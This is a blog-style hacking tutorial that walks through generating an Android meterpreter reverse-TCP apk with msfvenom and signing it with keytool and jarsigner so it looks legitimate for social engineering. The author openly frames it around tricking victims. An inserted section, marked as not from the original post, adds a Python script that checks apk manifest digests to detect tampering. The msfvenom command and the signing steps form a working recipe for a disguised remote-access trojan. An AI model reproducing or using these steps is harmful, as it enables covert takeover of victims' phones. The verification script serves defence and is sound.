@pry0cc insisted that I write a post on how I manually signed an apk file, as I mentioned in my earlier post. As requested, here it is. Please also see this link here, which is the reference I used for my so-called 1337 hax. Before I begin, what you’ll need is:
- Metasploit
- Msfvenom
- Payload
- keytool
- jarsigner
- A brain (please)
#Generating apk file
The first step is of course generating the apk file with meterpreter embedded in it. Any payload is usable, but I used android/meterpreter/reverse_tcp with lport 8080 and my external IP address. The command I used was:
```
msfvenom -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=8080 > z.apk
```
Simple enough?
Of course you could try to social engineer with the apk file as it is, but I found that signing the apk file makes it look more “realistic”; that is your choice.
#Signing apk file
There are two tools you’ll need, Keytool and Jarsigner. The first step is generating the keystore. When I did this, I didn’t change much in the command. Why? It was late and I really didn’t care that much.
Anyways, the command used was:
```
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
```
The command is pretty self-explanatory.
Now it is time to sign the apk file using this command (the alias must match the one given to keytool above):
```
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk alias_name
```
Again, modify the flags as needed.
Of course, you could also verify the apk file with this command:
```
jarsigner -verify -verbose -certs APPNAME.apk
```
but I took the risk without checking the apk file because I’m a 1337 haxor.
And that’s it.
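As an added example that is not from the original post: what jarsigner actually produces is the v1 (JAR) signature scheme. It writes a META-INF/MANIFEST.MF that records a base64 SHA1 digest of every file in the archive, a .SF file carrying digests of that manifest, and a .RSA file holding a PKCS#7 signature over the .SF. The script below (assumed names, standard library only, working on a constructed in-memory apk rather than a real one) parses that manifest and re-computes each entry's digest, which is the integrity layer `jarsigner -verify` checks before it validates the certificate chain. It flags a file whose content was changed after signing and a file added without a manifest entry, the two things a repackaged apk typically shows. It does not check the .SF/.RSA signature itself, so it complements `jarsigner -verify -verbose -certs` rather than replacing it. Note also that jarsigner only emits this v1 scheme; apps targeting Android 11 and later must additionally carry a v2 or newer signature, which Android's apksigner tool adds.

```python
import base64
import hashlib
import io
import zipfile


def parse_manifest(text):
    """Parse a JAR MANIFEST.MF into {entry name: SHA1-Digest (base64)}.

    Sections are separated by blank lines; a line starting with a single
    space continues the previous (over-long) line, per the JAR spec.
    """
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)

    digests = {}
    name = None
    for line in lines:
        if not line.strip():
            name = None  # blank line closes the current section
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Name":
            name = value
        elif key == "SHA1-Digest" and name:
            digests[name] = value
    return digests


def check_apk_manifest(apk_bytes):
    """Re-compute SHA1 of every non-META-INF entry and compare with the manifest.

    Returns (ok, problems); problems is a list of human-readable findings.
    """
    problems = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = set(z.namelist())
        if "META-INF/MANIFEST.MF" not in names:
            return False, ["no META-INF/MANIFEST.MF (unsigned apk)"]
        digests = parse_manifest(z.read("META-INF/MANIFEST.MF").decode("utf-8"))
        for entry in sorted(names):
            if entry.startswith("META-INF/") or entry.endswith("/"):
                continue  # signature files and directories are not digested
            expected = digests.get(entry)
            if expected is None:
                problems.append(f"{entry}: not covered by manifest")
                continue
            actual = base64.b64encode(hashlib.sha1(z.read(entry)).digest()).decode()
            if actual != expected:
                problems.append(f"{entry}: digest mismatch")
    return not problems, problems


def build_sample_apk(files, tampered=None, extra=None):
    """Constructed test fixture: a zip with a v1-style MANIFEST.MF.

    `tampered` maps entry -> bytes written AFTER the digests were computed
    (simulating a file modified post-signing); `extra` maps names to bytes
    added with no manifest entry (simulating an injected file).
    """
    manifest = ["Manifest-Version: 1.0", "Created-By: constructed example", ""]
    for name, data in files.items():
        digest = base64.b64encode(hashlib.sha1(data).digest()).decode()
        manifest += [f"Name: {name}", f"SHA1-Digest: {digest}", ""]

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("META-INF/MANIFEST.MF", "\r\n".join(manifest) + "\r\n")
        for name, data in files.items():
            z.writestr(name, (tampered or {}).get(name, data))
        for name, data in (extra or {}).items():
            z.writestr(name, data)
    return buf.getvalue()


# Constructed sample contents; real apks carry a real dex and binary XML.
SAMPLE_FILES = {
    "AndroidManifest.xml": b"<manifest package='example.constructed'/>",
    "classes.dex": b"dex\n035\x00constructed-dex-bytes",
}

if __name__ == "__main__":
    for label, apk in [
        ("intact", build_sample_apk(SAMPLE_FILES)),
        ("modified dex", build_sample_apk(SAMPLE_FILES, tampered={"classes.dex": b"dex\n035\x00patched"})),
        ("injected file", build_sample_apk(SAMPLE_FILES, extra={"assets/dropped.bin": b"\x00"})),
    ]:
        ok, problems = check_apk_manifest(apk)
        print(f"{label}: {'OK' if ok else 'FAIL'} {problems}")
```

Run against a real apk with `check_apk_manifest(open("APPNAME.apk", "rb").read())`; an unsigned msfvenom output has no META-INF/MANIFEST.MF at all, which is the first thing the check reports, and a copy modified after signing shows up as a digest mismatch even though the .RSA file is still present.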
#Conclusion
Of course, without a victim it isn’t fun doing all this sooo hard work. I gotta admit, this is lazy and a skid move, but when it comes to SE it works almost all the time if you do it right. I do not recommend using meterpreter unless you are trolling like I do, and this will not work on those who are intelligent enough. Above all else I recommend your very own coded reverse shell, like the tutorials that @0x00pf wrote, which helped me a lot in learning about reverse shells. Thank you!
Anyways, I think that basically wraps everything up, at least for now, and I hope this clears up some confusion and some doubts.
Cheers!